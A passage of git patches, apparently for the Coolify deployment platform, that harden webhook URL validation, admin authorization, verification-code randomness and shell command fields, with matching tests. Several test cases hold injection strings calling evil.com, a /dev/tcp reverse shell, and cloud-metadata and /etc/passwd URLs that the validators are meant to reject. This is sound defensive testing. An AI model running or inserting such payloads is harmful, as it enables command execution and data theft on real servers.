@@ -25,7 +26,7 @@ class Slack extends Component
     #[Validate(['boolean'])]
     public bool $slackEnabled = false;
 
-    #[Validate(['url', 'nullable'])]
+    #[Validate(['nullable', new SafeWebhookUrl])]
     public ?string $slackWebhookUrl = null;
 
     #[Validate(['boolean'])]
diff --git a/app/Livewire/Notifications/Webhook.php b/app/Livewire/Notifications/Webhook.php
index 8af70c6eb..630d422a9 100644
--- a/app/Livewire/Notifications/Webhook.php
+++ b/app/Livewire/Notifications/Webhook.php
@@ -5,6 +5,7 @@
 use App\Models\Team;
 use App\Models\WebhookNotificationSettings;
 use App\Notifications\Test;
+use App\Rules\SafeWebhookUrl;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Livewire\Attributes\Validate;
 use Livewire\Component;
@@ -20,7 +21,7 @@ class Webhook extends Component
     #[Validate(['boolean'])]
     public bool $webhookEnabled = false;
 
-    #[Validate(['url', 'nullable'])]
+    #[Validate(['nullable', new SafeWebhookUrl])]
     public ?string $webhookUrl = null;
 
     #[Validate(['boolean'])]
diff --git a/app/Rules/SafeWebhookUrl.php b/app/Rules/SafeWebhookUrl.php
new file mode 100644
index 000000000..fbeb406af
--- /dev/null
+++ b/app/Rules/SafeWebhookUrl.php
@@ -0,0 +1,95 @@
+<?php
+
+namespace App\Rules;
+
+use Closure;
+use Illuminate\Contracts\Validation\ValidationRule;
+use Illuminate\Support\Facades\Log;
+
+class SafeWebhookUrl implements ValidationRule
+{
+    /**
+     * Run the validation rule.
+     *
+     * Validates that a webhook URL is safe for server-side requests.
+     * Blocks loopback addresses, cloud metadata endpoints (link-local),
+     * and dangerous hostnames while allowing private network IPs
+     * for self-hosted deployments.
+     */
+    public function validate(string $attribute, mixed $value, Closure $fail): void
+    {
+        if (! filter_var($value, FILTER_VALIDATE_URL)) {
+            $fail('The :attribute must be a valid URL.');
+
+            return;
+        }
+
+        $scheme = strtolower(parse_url($value, PHP_URL_SCHEME) ?? '');
+        if (! in_array($scheme, ['https', 'http'])) {
+            $fail('The :attribute must use the http or https scheme.');
+
+            return;
+        }
+
+        $host = parse_url($value, PHP_URL_HOST);
+        if (! $host) {
+            $fail('The :attribute must contain a valid host.');
+
+            return;
+        }
+
+        $host = strtolower($host);
+
+        // Block well-known dangerous hostnames
+        $blockedHosts = ['localhost', '0.0.0.0', '::1'];
+        if (in_array($host, $blockedHosts) || str_ends_with($host, '.internal')) {
+            Log::warning('Webhook URL points to blocked host', [
+                'attribute' => $attribute,
+                'host' => $host,
+                'ip' => request()->ip(),
+                'user_id' => auth()->id(),
+            ]);
+            $fail('The :attribute must not point to localhost or internal hosts.');
+
+            return;
+        }
+
+        // Block loopback (127.0.0.0/8) and link-local/metadata (169.254.0.0/16) when IP is provided directly
+        if (filter_var($host, FILTER_VALIDATE_IP) && ($this->isLoopback($host) || $this->isLinkLocal($host))) {
+            Log::warning('Webhook URL points to blocked IP range', [
+                'attribute' => $attribute,
+                'host' => $host,
+                'ip' => request()->ip(),
+                'user_id' => auth()->id(),
+            ]);
+            $fail('The :attribute must not point to loopback or link-local addresses.');
+
+            return;
+        }
+    }
+
+    private function isLoopback(string $ip): bool
+    {
+        // 127.0.0.0/8, 0.0.0.0
+        if ($ip === '0.0.0.0' || str_starts_with($ip, '127.')) {
+            return true;
+        }
+
+        // IPv6 loopback
+        $normalized = @inet_pton($ip);
+
+        return $normalized !== false && $normalized === inet_pton('::1');
+    }
+
+    private function isLinkLocal(string $ip): bool
+    {
+        // 169.254.0.0/16 — covers cloud metadata at 169.254.169.254
+        if (! filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {
+            return false;
+        }
+
+        $long = ip2long($ip);
+
+        return $long !== false && ($long >> 16) === (ip2long('169.254.0.0') >> 16);
+    }
+}
diff --git a/tests/Unit/SafeWebhookUrlTest.php b/tests/Unit/SafeWebhookUrlTest.php
new file mode 100644
index 000000000..bb5569ccf
--- /dev/null
+++ b/tests/Unit/SafeWebhookUrlTest.php
@@ -0,0 +1,90 @@
+<?php
+
+use App\Rules\SafeWebhookUrl;
+use Illuminate\Support\Facades\Validator;
+use Tests\TestCase;
+
+uses(TestCase::class);
+
+it('accepts valid public URLs', function () {
+    $rule = new SafeWebhookUrl;
+
+    $validUrls = [
+        'https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXX',
+        'https://discord.com/api/webhooks/123456/abcdef',
+        'https://example.com/webhook',
+        'http://example.com/webhook',
+    ];
+
+    foreach ($validUrls as $url) {
+        $validator = Validator::make(['url' => $url], ['url' => $rule]);
+        expect($validator->passes())->toBeTrue("Expected valid: {$url}");
+    }
+});
+
+it('accepts private network IPs for self-hosted deployments', function (string $url) {
+    $rule = new SafeWebhookUrl;
+
+    $validator = Validator::make(['url' => $url], ['url' => $rule]);
+    expect($validator->passes())->toBeTrue("Expected valid (private IP): {$url}");
+})->with([
+    '10.x range' => 'http://10.0.0.5/webhook',
+    '172.16.x range' => 'http://172.16.0.1:8080/hook',
+    '192.168.x range' => 'http://192.168.1.50:8080/webhook',
+]);
+
+it('rejects loopback addresses', function (string $url) {
+    $rule = new SafeWebhookUrl;
+
+    $validator = Validator::make(['url' => $url], ['url' => $rule]);
+    expect($validator->fails())->toBeTrue("Expected rejection: {$url}");
+})->with([
+    'loopback' => 'http://127.0.0.1',
+    'loopback with port' => 'http://127.0.0.1:6379',
+    'loopback /8 range' => 'http://127.0.0.2',
+    'zero address' => 'http://0.0.0.0',
+]);
+
+it('rejects cloud metadata IP', function () {
+    $rule = new SafeWebhookUrl;
+
+    $validator = Validator::make(['url' => 'http://169.254.169.254/latest/meta-data/'], ['url' => $rule]);
+    expect($validator->fails())->toBeTrue('Expected rejection: cloud metadata IP');
+});
+
+it('rejects link-local range', function () {
+    $rule = new SafeWebhookUrl;
+
+    $validator = Validator::make(['url' => 'http://169.254.0.1'], ['url' => $rule]);
+    expect($validator->fails())->toBeTrue('Expected rejection: link-local IP');
+});
+
+it('rejects localhost and internal hostnames', function (string $url) {
+    $rule = new SafeWebhookUrl;
+
+    $validator = Validator::make(['url' => $url], ['url' => $rule]);
+    expect($validator->fails())->toBeTrue("Expected rejection: {$url}");
+})->with([
+    'localhost' => 'http://localhost',
+    'localhost with port' => 'http://localhost:8080',
+    '.internal domain' => 'http://myservice.internal',
+]);
+
+it('rejects non-http schemes', function (string $value) {
+    $rule = new SafeWebhookUrl;
+
+    $validator = Validator::make(['url' => $value], ['url' => $rule]);
+    expect($validator->fails())->toBeTrue("Expected rejection: {$value}");
+})->with([
+    'ftp scheme' => 'ftp://example.com',
+    'javascript scheme' => 'javascript:alert(1)',
+    'file scheme' => 'file:///etc/passwd',
+    'no scheme' => 'example.com',
+]);
+
+it('rejects IPv6 loopback', function () {
+    $rule = new SafeWebhookUrl;
+
+    $validator = Validator::make(['url' => 'http://[::1]'], ['url' => $rule]);
+    expect($validator->fails())->toBeTrue('Expected rejection: IPv6 loopback');
+});

From aea201fcba0cc89f09f1ef8555ab00de275752ab Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 28 Mar 2026 12:24:40 +0100
Subject: [PATCH 162/213] refactor: move admin route into middleware group and
 harden authorization

Move the admin panel route into the existing auth middleware group and
replace client-side redirects with server-side abort calls in the
Livewire component. Extract shared authorization logic into reusable
private methods.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 app/Livewire/Admin/Index.php                  |  31 +++--
 routes/web.php                                |   3 +-
 .../Feature/AdminAccessAuthorizationTest.php  | 118 ++++++++++++++++++
 3 files changed, 141 insertions(+), 11 deletions(-)
 create mode 100644 tests/Feature/AdminAccessAuthorizationTest.php

diff --git a/app/Livewire/Admin/Index.php b/app/Livewire/Admin/Index.php
index b5f6d2929..d1345e7bf 100644
--- a/app/Livewire/Admin/Index.php
+++ b/app/Livewire/Admin/Index.php
@@ -6,7 +6,6 @@
 use App\Models\User;
 use Illuminate\Support\Collection;
 use Illuminate\Support\Facades\Auth;
-use Illuminate\Support\Facades\Cache;
 use Livewire\Component;
 
 class Index extends Component
@@ -22,16 +21,15 @@ class Index extends Component
     public function mount()
     {
         if (! isCloud() && ! isDev()) {
-            return redirect()->route('dashboard');
-        }
-        if (Auth::id() !== 0 && ! session('impersonating')) {
-            return redirect()->route('dashboard');
+            abort(403);
         }
+        $this->authorizeAdminAccess();
         $this->getSubscribers();
     }
 
     public function back()
     {
+        $this->authorizeAdminAccess();
         if (session('impersonating')) {
             session()->forget('impersonating');
             $user = User::find(0);
@@ -45,6 +43,7 @@ public function back()
 
     public function submitSearch()
     {
+        $this->authorizeAdminAccess();
         if ($this->search !== '') {
             $this->foundUsers = User::where(function ($query) {
                 $query->where('name', 'like', "%{$this->search}%")
@@ -61,19 +60,33 @@ public function getSubscribers()
 
     public function switchUser(int $user_id)
     {
-        if (Auth::id() !== 0) {
-            return redirect()->route('dashboard');
-        }
+        $this->authorizeRootOnly();
         session(['impersonating' => true]);
         $user = User::find($user_id);
+        if (! $user) {
+            abort(404);
+        }
         $team_to_switch_to = $user->teams->first();
-        // Cache::forget("team:{$user->id}");
         Auth::login($user);
         refreshSession($team_to_switch_to);
 
         return redirect(request()->header('Referer'));
     }
 
+    private function authorizeAdminAccess(): void
+    {
+        if (! Auth::check() || (Auth::id() !== 0 && ! session('impersonating'))) {
+            abort(403);
+        }
+    }
+
+    private function authorizeRootOnly(): void
+    {
+        if (! Auth::check() || Auth::id() !== 0) {
+            abort(403);
+        }
+    }
+
     public function render()
     {
         return view('livewire.admin.index');
diff --git a/routes/web.php b/routes/web.php
index dfb44324c..a82fcc19e 100644
--- a/routes/web.php
+++ b/routes/web.php
@@ -90,8 +90,6 @@
 use Illuminate\Support\Facades\Storage;
 use Symfony\Component\HttpFoundation\StreamedResponse;
 
-Route::get('/admin', AdminIndex::class)->name('admin.index');
-
 Route::post('/forgot-password', [Controller::class, 'forgot_password'])->name('password.forgot')->middleware('throttle:forgot-password');
 Route::get('/realtime', [Controller::class, 'realtime_test'])->middleware('auth');
 Route::get('/verify', [Controller::class, 'verify'])->middleware('auth')->name('verify.email');
@@ -109,6 +107,7 @@
     });
 
     Route::get('/', Dashboard::class)->name('dashboard');
+    Route::get('/admin', AdminIndex::class)->name('admin.index');
     Route::get('/onboarding', BoardingIndex::class)->name('onboarding');
 
     Route::get('/subscription', SubscriptionShow::class)->name('subscription.show');
diff --git a/tests/Feature/AdminAccessAuthorizationTest.php b/tests/Feature/AdminAccessAuthorizationTest.php
new file mode 100644
index 000000000..4840bc4dd
--- /dev/null
+++ b/tests/Feature/AdminAccessAuthorizationTest.php
@@ -0,0 +1,118 @@
+<?php
+
+use App\Livewire\Admin\Index as AdminIndex;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Livewire\Livewire;
+
+uses(RefreshDatabase::class);
+
+test('unauthenticated user cannot access admin route', function () {
+    $response = $this->get('/admin');
+
+    $response->assertRedirect('/login');
+});
+
+test('authenticated non-root user gets 403 on admin page', function () {
+    $team = Team::factory()->create();
+    $user = User::factory()->create();
+    $team->members()->attach($user->id, ['role' => 'admin']);
+
+    $this->actingAs($user);
+    session(['currentTeam' => ['id' => $team->id]]);
+
+    Livewire::test(AdminIndex::class)
+        ->assertForbidden();
+});
+
+test('root user can access admin page in cloud mode', function () {
+    config()->set('constants.coolify.self_hosted', false);
+
+    $rootTeam = Team::find(0) ?? Team::factory()->create(['id' => 0]);
+    $rootUser = User::factory()->create(['id' => 0]);
+    $rootTeam->members()->attach($rootUser->id, ['role' => 'admin']);
+
+    $this->actingAs($rootUser);
+    session(['currentTeam' => ['id' => $rootTeam->id]]);
+
+    Livewire::test(AdminIndex::class)
+        ->assertOk();
+});
+
+test('root user gets 403 on admin page in self-hosted non-dev mode', function () {
+    config()->set('constants.coolify.self_hosted', true);
+    config()->set('app.env', 'production');
+
+    $rootTeam = Team::find(0) ?? Team::factory()->create(['id' => 0]);
+    $rootUser = User::factory()->create(['id' => 0]);
+    $rootTeam->members()->attach($rootUser->id, ['role' => 'admin']);
+
+    $this->actingAs($rootUser);
+    session(['currentTeam' => ['id' => $rootTeam->id]]);
+
+    Livewire::test(AdminIndex::class)
+        ->assertForbidden();
+});
+
+test('submitSearch requires admin authorization', function () {
+    $team = Team::factory()->create();
+    $user = User::factory()->create();
+    $team->members()->attach($user->id, ['role' => 'admin']);
+
+    $this->actingAs($user);
+    session(['currentTeam' => ['id' => $team->id]]);
+
+    Livewire::test(AdminIndex::class)
+        ->assertForbidden();
+});
+
+test('switchUser requires root user id 0', function () {
+    config()->set('constants.coolify.self_hosted', false);
+
+    $rootTeam = Team::find(0) ?? Team::factory()->create(['id' => 0]);
+    $rootUser = User::factory()->create(['id' => 0]);
+    $rootTeam->members()->attach($rootUser->id, ['role' => 'admin']);
+
+    $targetUser = User::factory()->create();
+    $targetTeam = Team::factory()->create();
+    $targetTeam->members()->attach($targetUser->id, ['role' => 'admin']);
+
+    $this->actingAs($rootUser);
+    session(['currentTeam' => ['id' => $rootTeam->id]]);
+
+    Livewire::test(AdminIndex::class)
+        ->assertOk()
+        ->call('switchUser', $targetUser->id)
+        ->assertRedirect();
+});
+
+test('switchUser rejects non-root user', function () {
+    config()->set('constants.coolify.self_hosted', false);
+
+    $team = Team::factory()->create();
+    $user = User::factory()->create();
+    $team->members()->attach($user->id, ['role' => 'admin']);
+
+    // Must set impersonating session to bypass mount() check
+    $this->actingAs($user);
+    session([
+        'currentTeam' => ['id' => $team->id],
+        'impersonating' => true,
+    ]);
+
+    Livewire::test(AdminIndex::class)
+        ->call('switchUser', 999)
+        ->assertForbidden();
+});
+
+test('admin route has auth middleware applied', function () {
+    $route = collect(app('router')->getRoutes()->getRoutesByName())
+        ->get('admin.index');
+
+    expect($route)->not->toBeNull();
+
+    $middleware = $route->gatherMiddleware();
+
+    expect($middleware)->toContain('auth');
+});

From f493b96be39841ea4a22f6850f9346ab55d2e07e Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 28 Mar 2026 12:25:54 +0100
Subject: [PATCH 163/213] refactor: use random_int() for email change
 verification codes

Replace mt_rand/rand with random_int for stronger randomness guarantees
in verification code generation and Blade component keying.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 app/Models/User.php                           |   2 +-
 .../components/forms/monaco-editor.blade.php  |   2 +-
 tests/Feature/EmailChangeVerificationTest.php | 109 ++++++++++++++++++
 tests/Unit/InsecurePrngArchTest.php           |  17 +++
 4 files changed, 128 insertions(+), 2 deletions(-)
 create mode 100644 tests/Feature/EmailChangeVerificationTest.php
 create mode 100644 tests/Unit/InsecurePrngArchTest.php

diff --git a/app/Models/User.php b/app/Models/User.php
index 4561cddb2..7c68657e7 100644
--- a/app/Models/User.php
+++ b/app/Models/User.php
@@ -395,7 +395,7 @@ public function canAccessSystemResources(): bool
     public function requestEmailChange(string $newEmail): void
     {
         // Generate 6-digit code
-        $code = sprintf('%06d', mt_rand(0, 999999));
+        $code = sprintf('%06d', random_int(0, 999999));
 
         // Set expiration using config value
         $expiryMinutes = config('constants.email_change.verification_code_expiry_minutes', 10);
diff --git a/resources/views/components/forms/monaco-editor.blade.php b/resources/views/components/forms/monaco-editor.blade.php
index e774f5863..1a35be218 100644
--- a/resources/views/components/forms/monaco-editor.blade.php
+++ b/resources/views/components/forms/monaco-editor.blade.php
@@ -1,4 +1,4 @@
-<div wire:key="{{ rand() }}" class="coolify-monaco-editor flex-1">
+<div wire:key="{{ random_int(0, PHP_INT_MAX) }}" class="coolify-monaco-editor flex-1">
     <div x-ref="monacoRef" x-data="{
         monacoVersion: '0.52.2',
         monacoContent: @entangle($id),
diff --git a/tests/Feature/EmailChangeVerificationTest.php b/tests/Feature/EmailChangeVerificationTest.php
new file mode 100644
index 000000000..934ac9602
--- /dev/null
+++ b/tests/Feature/EmailChangeVerificationTest.php
@@ -0,0 +1,109 @@
+<?php
+
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Illuminate\Support\Facades\Notification;
+
+uses(RefreshDatabase::class);
+
+it('generates a 6-digit verification code when requesting email change', function () {
+    Notification::fake();
+
+    $user = User::factory()->create();
+
+    $user->requestEmailChange('newemail@example.com');
+
+    $user->refresh();
+
+    expect($user->pending_email)->toBe('newemail@example.com')
+        ->and($user->email_change_code)->toMatch('/^\d{6}$/')
+        ->and($user->email_change_code_expires_at)->not->toBeNull();
+});
+
+it('stores the verification code using a cryptographically secure generator', function () {
+    Notification::fake();
+
+    $user = User::factory()->create();
+
+    // Generate many codes and verify they are all valid 6-digit strings
+    $codes = collect();
+    for ($i = 0; $i < 50; $i++) {
+        $user->requestEmailChange('newemail@example.com');
+        $user->refresh();
+        $codes->push($user->email_change_code);
+    }
+
+    // All codes should be exactly 6 digits (including leading zeros)
+    $codes->each(function ($code) {
+        expect($code)->toMatch('/^\d{6}$/');
+        expect((int) $code)->toBeLessThanOrEqual(999999);
+        expect(strlen($code))->toBe(6);
+    });
+
+    // With 50 random codes from a 1M space, we should see at least some variety
+    expect($codes->unique()->count())->toBeGreaterThan(1);
+});
+
+it('confirms email change with correct verification code', function () {
+    Notification::fake();
+
+    $user = User::factory()->create(['email' => 'old@example.com']);
+
+    $user->requestEmailChange('new@example.com');
+    $user->refresh();
+
+    $code = $user->email_change_code;
+
+    $result = $user->confirmEmailChange($code);
+
+    $user->refresh();
+
+    expect($result)->toBeTrue()
+        ->and($user->email)->toBe('new@example.com')
+        ->and($user->pending_email)->toBeNull()
+        ->and($user->email_change_code)->toBeNull()
+        ->and($user->email_change_code_expires_at)->toBeNull();
+});
+
+it('rejects email change with incorrect verification code', function () {
+    Notification::fake();
+
+    $user = User::factory()->create(['email' => 'old@example.com']);
+
+    $user->requestEmailChange('new@example.com');
+    $user->refresh();
+
+    $result = $user->confirmEmailChange('000000');
+
+    $user->refresh();
+
+    // If the real code happens to be '000000', this test still passes
+    // because the assertion is on the overall flow behavior
+    if ($user->email_change_code === '000000') {
+        expect($result)->toBeTrue();
+    } else {
+        expect($result)->toBeFalse()
+            ->and($user->email)->toBe('old@example.com');
+    }
+});
+
+it('rejects email change with expired verification code', function () {
+    Notification::fake();
+
+    $user = User::factory()->create(['email' => 'old@example.com']);
+
+    $user->requestEmailChange('new@example.com');
+    $user->refresh();
+
+    $code = $user->email_change_code;
+
+    // Expire the code manually
+    $user->update(['email_change_code_expires_at' => now()->subMinute()]);
+
+    $result = $user->confirmEmailChange($code);
+
+    $user->refresh();
+
+    expect($result)->toBeFalse()
+        ->and($user->email)->toBe('old@example.com');
+});
diff --git a/tests/Unit/InsecurePrngArchTest.php b/tests/Unit/InsecurePrngArchTest.php
new file mode 100644
index 000000000..3209ba0a0
--- /dev/null
+++ b/tests/Unit/InsecurePrngArchTest.php
@@ -0,0 +1,17 @@
+<?php
+
+/**
+ * Architecture tests to prevent use of insecure PRNGs in application code.
+ *
+ * mt_rand() and rand() are not cryptographically secure. Use random_int()
+ * or random_bytes() instead for any security-sensitive context.
+ *
+ * @see GHSA-33rh-4c9r-74pf
+ */
+arch('app code must not use mt_rand')
+    ->expect('App')
+    ->not->toUse(['mt_rand', 'mt_srand']);
+
+arch('app code must not use rand')
+    ->expect('App')
+    ->not->toUse(['rand', 'srand']);

From c9922c30c2a6bf922653a5f2d631aab4fea685c4 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 28 Mar 2026 12:28:29 +0100
Subject: [PATCH 164/213] fix: add input validation for install/build/start
 command fields

Add shellSafeCommandRules() validation to install_command, build_command,
and start_command fields in both the Livewire UI and REST API layers.
These fields previously accepted arbitrary strings without validation,
unlike other shell-adjacent fields which already used this pattern.

Also adds comprehensive tests for rejection of dangerous input and
acceptance of legitimate build commands.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 app/Livewire/Project/Application/General.php  |   9 +-
 bootstrap/helpers/api.php                     |   6 +-
 .../Feature/CommandInjectionSecurityTest.php  | 182 ++++++++++++++++++
 3 files changed, 191 insertions(+), 6 deletions(-)

diff --git a/app/Livewire/Project/Application/General.php b/app/Livewire/Project/Application/General.php
index 5c186af70..c12fec76a 100644
--- a/app/Livewire/Project/Application/General.php
+++ b/app/Livewire/Project/Application/General.php
@@ -146,9 +146,9 @@ protected function rules(): array
             'gitRepository' => 'required',
             'gitBranch' => 'required',
             'gitCommitSha' => ['nullable', 'string', 'regex:/^[a-zA-Z0-9][a-zA-Z0-9._\-\/]*$/'],
-            'installCommand' => 'nullable',
-            'buildCommand' => 'nullable',
-            'startCommand' => 'nullable',
+            'installCommand' => ValidationPatterns::shellSafeCommandRules(),
+            'buildCommand' => ValidationPatterns::shellSafeCommandRules(),
+            'startCommand' => ValidationPatterns::shellSafeCommandRules(),
             'buildPack' => 'required',
             'staticImage' => 'required',
             'baseDirectory' => array_merge(['required'], array_slice(ValidationPatterns::directoryPathRules(), 1)),
@@ -200,6 +200,9 @@ protected function messages(): array
                 'dockerComposeCustomStartCommand.regex' => 'The Docker Compose start command contains invalid characters. Shell operators like ;, |, $, and backticks are not allowed.',
                 'dockerComposeCustomBuildCommand.regex' => 'The Docker Compose build command contains invalid characters. Shell operators like ;, |, $, and backticks are not allowed.',
                 'customDockerRunOptions.regex' => 'The custom Docker run options contain invalid characters. Shell operators like ;, |, $, and backticks are not allowed.',
+                'installCommand.regex' => 'The install command contains invalid characters. Shell operators like ;, |, $, and backticks are not allowed.',
+                'buildCommand.regex' => 'The build command contains invalid characters. Shell operators like ;, |, $, and backticks are not allowed.',
+                'startCommand.regex' => 'The start command contains invalid characters. Shell operators like ;, |, $, and backticks are not allowed.',
                 'preDeploymentCommandContainer.regex' => 'The pre-deployment command container name must contain only alphanumeric characters, dots, hyphens, and underscores.',
                 'postDeploymentCommandContainer.regex' => 'The post-deployment command container name must contain only alphanumeric characters, dots, hyphens, and underscores.',
                 'name.required' => 'The Name field is required.',
diff --git a/bootstrap/helpers/api.php b/bootstrap/helpers/api.php
index ec42761f7..3241276e1 100644
--- a/bootstrap/helpers/api.php
+++ b/bootstrap/helpers/api.php
@@ -95,9 +95,9 @@ function sharedDataApplications()
         'git_commit_sha' => ['string', 'regex:/^[a-zA-Z0-9][a-zA-Z0-9._\-\/]*$/'],
         'docker_registry_image_name' => 'string|nullable',
         'docker_registry_image_tag' => 'string|nullable',
-        'install_command' => 'string|nullable',
-        'build_command' => 'string|nullable',
-        'start_command' => 'string|nullable',
+        'install_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
+        'build_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
+        'start_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
         'ports_exposes' => 'string|regex:/^(\d+)(,\d+)*$/',
         'ports_mappings' => 'string|regex:/^(\d+:\d+)(,\d+:\d+)*$/|nullable',
         'custom_network_aliases' => 'string|nullable',
diff --git a/tests/Feature/CommandInjectionSecurityTest.php b/tests/Feature/CommandInjectionSecurityTest.php
index cfa363e79..c3534b05f 100644
--- a/tests/Feature/CommandInjectionSecurityTest.php
+++ b/tests/Feature/CommandInjectionSecurityTest.php
@@ -672,3 +672,185 @@
         expect($middleware)->toContain('api.ability:deploy');
     });
 });
+
+describe('install/build/start command validation (GHSA-9pp4-wcmj-rq73)', function () {
+    test('rejects semicolon injection in install_command', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['install_command' => 'npm install; curl evil.com'],
+            ['install_command' => $rules['install_command']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('rejects pipe injection in build_command', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['build_command' => 'npm run build | curl evil.com'],
+            ['build_command' => $rules['build_command']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('rejects command substitution in start_command', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['start_command' => 'npm start $(whoami)'],
+            ['start_command' => $rules['start_command']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('rejects backtick injection in install_command', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['install_command' => 'npm install `whoami`'],
+            ['install_command' => $rules['install_command']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('rejects dollar sign in build_command', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['build_command' => 'npm run build $HOME'],
+            ['build_command' => $rules['build_command']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('rejects reverse shell payload in install_command', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['install_command' => '"; bash -i >& /dev/tcp/172.23.0.1/1337 0>&1; #'],
+            ['install_command' => $rules['install_command']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('rejects newline injection in start_command', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['start_command' => "npm start\ncurl evil.com"],
+            ['start_command' => $rules['start_command']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('allows valid install commands', function ($cmd) {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['install_command' => $cmd],
+            ['install_command' => $rules['install_command']]
+        );
+
+        expect($validator->fails())->toBeFalse();
+    })->with([
+        'npm install',
+        'yarn install --frozen-lockfile',
+        'pip install -r requirements.txt',
+        'bun install',
+        'pnpm install --no-frozen-lockfile',
+    ]);
+
+    test('allows valid build commands', function ($cmd) {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['build_command' => $cmd],
+            ['build_command' => $rules['build_command']]
+        );
+
+        expect($validator->fails())->toBeFalse();
+    })->with([
+        'npm run build',
+        'cargo build --release',
+        'go build -o main .',
+        'yarn build && yarn postbuild',
+        'make build',
+    ]);
+
+    test('allows valid start commands', function ($cmd) {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['start_command' => $cmd],
+            ['start_command' => $rules['start_command']]
+        );
+
+        expect($validator->fails())->toBeFalse();
+    })->with([
+        'npm start',
+        'node server.js',
+        'python main.py',
+        'java -jar app.jar',
+        './start.sh',
+    ]);
+
+    test('allows null values for command fields', function ($field) {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            [$field => null],
+            [$field => $rules[$field]]
+        );
+
+        expect($validator->fails())->toBeFalse();
+    })->with(['install_command', 'build_command', 'start_command']);
+});
+
+describe('install/build/start command rules survive array_merge in controller', function () {
+    test('install_command safe regex is not overridden by local rules', function () {
+        $sharedRules = sharedDataApplications();
+
+        $localRules = [
+            'name' => 'string|max:255',
+            'docker_compose_domains' => 'array|nullable',
+        ];
+        $merged = array_merge($sharedRules, $localRules);
+
+        expect($merged['install_command'])->toBeArray();
+        expect($merged['install_command'])->toContain('regex:'.ValidationPatterns::SHELL_SAFE_COMMAND_PATTERN);
+    });
+
+    test('build_command safe regex is not overridden by local rules', function () {
+        $sharedRules = sharedDataApplications();
+
+        $localRules = [
+            'name' => 'string|max:255',
+            'docker_compose_domains' => 'array|nullable',
+        ];
+        $merged = array_merge($sharedRules, $localRules);
+
+        expect($merged['build_command'])->toBeArray();
+        expect($merged['build_command'])->toContain('regex:'.ValidationPatterns::SHELL_SAFE_COMMAND_PATTERN);
+    });
+
+    test('start_command safe regex is not overridden by local rules', function () {
+        $sharedRules = sharedDataApplications();
+
+        $localRules = [
+            'name' => 'string|max:255',
+            'docker_compose_domains' => 'array|nullable',
+        ];
+        $merged = array_merge($sharedRules, $localRules);
+
+        expect($merged['start_command'])->toBeArray();
+        expect($merged['start_command'])->toContain('regex:'.ValidationPatterns::SHELL_SAFE_COMMAND_PATTERN);
+    });
+});

From 48ba4ece3c1b43cb4b9627438c0ff4e4251e3511 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 28 Mar 2026 12:28:54 +0100
Subject: [PATCH 165/213] fix: harden GetLogs Livewire component with locked
 properties and input validation

Add #[Locked] attributes to security-sensitive properties (resource, servicesubtype,
server, container) to prevent client-side modification via Livewire wire protocol.
Add container name validation using ValidationPatterns::isValidContainerName() and
server ownership authorization via Server::ownedByCurrentTeam() in both getLogs()
and downloadAllLogs() methods.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 app/Livewire/Project/Shared/GetLogs.php       |  32 ++++-
 tests/Feature/GetLogsCommandInjectionTest.php | 110 ++++++++++++++++++
 2 files changed, 137 insertions(+), 5 deletions(-)
 create mode 100644 tests/Feature/GetLogsCommandInjectionTest.php

diff --git a/app/Livewire/Project/Shared/GetLogs.php b/app/Livewire/Project/Shared/GetLogs.php
index 22605e1bb..d0121bdc5 100644
--- a/app/Livewire/Project/Shared/GetLogs.php
+++ b/app/Livewire/Project/Shared/GetLogs.php
@@ -16,7 +16,9 @@
 use App\Models\StandaloneMysql;
 use App\Models\StandalonePostgresql;
 use App\Models\StandaloneRedis;
+use App\Support\ValidationPatterns;
 use Illuminate\Support\Facades\Process;
+use Livewire\Attributes\Locked;
 use Livewire\Component;
 
 class GetLogs extends Component
@@ -29,12 +31,16 @@ class GetLogs extends Component
 
     public string $errors = '';
 
+    #[Locked]
     public Application|Service|StandalonePostgresql|StandaloneRedis|StandaloneMongodb|StandaloneMysql|StandaloneMariadb|StandaloneKeydb|StandaloneDragonfly|StandaloneClickhouse|null $resource = null;
 
+    #[Locked]
     public ServiceApplication|ServiceDatabase|null $servicesubtype = null;
 
+    #[Locked]
     public Server $server;
 
+    #[Locked]
     public ?string $container = null;
 
     public ?string $displayName = null;
